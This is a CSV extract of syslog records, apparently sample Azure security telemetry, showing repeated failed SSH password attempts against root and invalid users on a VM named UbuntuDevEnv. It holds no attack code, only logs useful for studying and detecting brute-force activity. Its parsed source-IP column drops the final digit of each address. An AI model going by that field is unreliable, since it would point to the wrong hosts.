+14636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:34,UbuntuDevEnv,2019-06-26 05:04:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=5.135.161.72,5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,5.135.161.7,,0,
+14637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:34,UbuntuDevEnv,2019-06-26 05:04:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:36,UbuntuDevEnv,2019-06-26 05:04:35,auth,UbuntuDevEnv,info,Failed password for invalid user forge from 5.135.161.72 port 57082 ssh2,5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forge,5.135.161.7,57082,,
+14639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:36,UbuntuDevEnv,2019-06-26 05:04:35,auth,UbuntuDevEnv,info,Received disconnect from 5.135.161.72 port 57082:11: Bye Bye [preauth],5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,5.135.161.7,57082,,
+14640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:36,UbuntuDevEnv,2019-06-26 05:04:35,auth,UbuntuDevEnv,info,Disconnected from invalid user forge 5.135.161.72 port 57082 [preauth],5082,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,forge,5.135.161.7,57082,,
+14641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:36,UbuntuDevEnv,2019-06-26 05:04:36,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25678 ssh2,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:42,UbuntuDevEnv,2019-06-26 05:04:41,auth,UbuntuDevEnv,info,Invalid user kan from 140.143.223.242 port 48032,5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kan,140.143.223.2,48032,,
+14643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:42,UbuntuDevEnv,2019-06-26 05:04:41,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 25678 ssh2],5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:42,UbuntuDevEnv,2019-06-26 05:04:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+14645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:42,UbuntuDevEnv,2019-06-26 05:04:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:43,UbuntuDevEnv,2019-06-26 05:04:43,auth,UbuntuDevEnv,info,Failed password for invalid user kan from 140.143.223.242 port 48032 ssh2,5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kan,140.143.223.2,48032,,
+14647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:44,UbuntuDevEnv,2019-06-26 05:04:43,auth,UbuntuDevEnv,info,Disconnected from invalid user kan 140.143.223.242 port 48032 [preauth],5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,kan,140.143.223.2,48032,,
+14648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:44,UbuntuDevEnv,2019-06-26 05:04:43,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 48032:11: Bye Bye [preauth],5103,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,48032,,
+14649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:44,UbuntuDevEnv,2019-06-26 05:04:43,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25678 ssh2,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:47,UbuntuDevEnv,2019-06-26 05:04:46,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 25678 ssh2 [preauth],5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:47,UbuntuDevEnv,2019-06-26 05:04:46,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 25678: Too many authentication failures [preauth],5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,25678,,
+14652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:47,UbuntuDevEnv,2019-06-26 05:04:46,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 25678 ssh2,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,25678,,
+14653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:47,UbuntuDevEnv,2019-06-26 05:04:46,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:47,UbuntuDevEnv,2019-06-26 05:04:46,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5072,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:50,UbuntuDevEnv,2019-06-26 05:04:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:04:52,UbuntuDevEnv,2019-06-26 05:04:51,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31749 ssh2,5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31749,,
+14657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:01,UbuntuDevEnv,2019-06-26 05:05:01,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 31749 ssh2],5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31749,,
+14658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:04,UbuntuDevEnv,2019-06-26 05:05:03,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:04,UbuntuDevEnv,2019-06-26 05:05:03,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 31749 ssh2 [preauth],5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31749,,
+14660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:04,UbuntuDevEnv,2019-06-26 05:05:03,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 31749: Too many authentication failures [preauth],5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,31749,,
+14661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:04,UbuntuDevEnv,2019-06-26 05:05:03,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31749 ssh2,5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31749,,
+14662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:04,UbuntuDevEnv,2019-06-26 05:05:03,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5137,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:07,UbuntuDevEnv,2019-06-26 05:05:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:10,UbuntuDevEnv,2019-06-26 05:05:09,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 40143 ssh2,5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40143,,
+14665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:22,UbuntuDevEnv,2019-06-26 05:05:22,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:22,UbuntuDevEnv,2019-06-26 05:05:22,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 40143 ssh2],5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40143,,
+14667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:22,UbuntuDevEnv,2019-06-26 05:05:22,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 40143 ssh2 [preauth],5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,40143,,
+14668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:22,UbuntuDevEnv,2019-06-26 05:05:22,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:22,UbuntuDevEnv,2019-06-26 05:05:22,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 40143: Too many authentication failures [preauth],5201,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,40143,,
+14670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:26,UbuntuDevEnv,2019-06-26 05:05:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:27,UbuntuDevEnv,2019-06-26 05:05:27,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 47756 ssh2,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,47756,,
+14672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:29,UbuntuDevEnv,2019-06-26 05:05:29,auth,UbuntuDevEnv,info,Invalid user ideprom from 200.6.188.38 port 62076,5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ideprom,200.6.188.3,62076,,
+14673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:29,UbuntuDevEnv,2019-06-26 05:05:29,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:29,UbuntuDevEnv,2019-06-26 05:05:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+14675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:31,UbuntuDevEnv,2019-06-26 05:05:30,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 47756 ssh2,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,47756,,
+14676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:31,UbuntuDevEnv,2019-06-26 05:05:31,auth,UbuntuDevEnv,info,Failed password for invalid user ideprom from 200.6.188.38 port 62076 ssh2,5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ideprom,200.6.188.3,62076,,
+14677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:31,UbuntuDevEnv,2019-06-26 05:05:31,auth,UbuntuDevEnv,info,Disconnected from invalid user ideprom 200.6.188.38 port 62076 [preauth],5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ideprom,200.6.188.3,62076,,
+14678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:31,UbuntuDevEnv,2019-06-26 05:05:31,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 62076:11: Bye Bye [preauth],5288,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,62076,,
+14679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:33,UbuntuDevEnv,2019-06-26 05:05:33,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 47756 ssh2,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,47756,,
+14680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:42,UbuntuDevEnv,2019-06-26 05:05:42,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 47756 ssh2],5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,47756,,
+14681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:42,UbuntuDevEnv,2019-06-26 05:05:42,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 47756 ssh2 [preauth],5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,47756,,
+14682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:42,UbuntuDevEnv,2019-06-26 05:05:42,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 47756: Too many authentication failures [preauth],5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,47756,,
+14683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:42,UbuntuDevEnv,2019-06-26 05:05:42,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:42,UbuntuDevEnv,2019-06-26 05:05:42,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,5273,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:45,UbuntuDevEnv,2019-06-26 05:05:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:47,UbuntuDevEnv,2019-06-26 05:05:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55288 ssh2,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:51,UbuntuDevEnv,2019-06-26 05:05:49,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55288 ssh2,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:51,UbuntuDevEnv,2019-06-26 05:05:50,auth,UbuntuDevEnv,info,Invalid user yann from 196.41.208.238 port 9699,5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yann,196.41.208.2,9699,,
+14689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:51,UbuntuDevEnv,2019-06-26 05:05:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+14690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:51,UbuntuDevEnv,2019-06-26 05:05:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+14691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:53,UbuntuDevEnv,2019-06-26 05:05:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 55288 ssh2,5339,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,55288,,
+14692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:53,UbuntuDevEnv,2019-06-26 05:05:52,auth,UbuntuDevEnv,info,Failed password for invalid user yann from 196.41.208.238 port 9699 ssh2,5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yann,196.41.208.2,9699,,
+14693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:53,UbuntuDevEnv,2019-06-26 05:05:53,auth,UbuntuDevEnv,info,Disconnected from invalid user yann 196.41.208.238 port 9699 [preauth],5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yann,196.41.208.2,9699,,
+14694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:05:53,UbuntuDevEnv,2019-06-26 05:05:53,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 9699:11: Bye Bye [preauth],5362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,9699,,
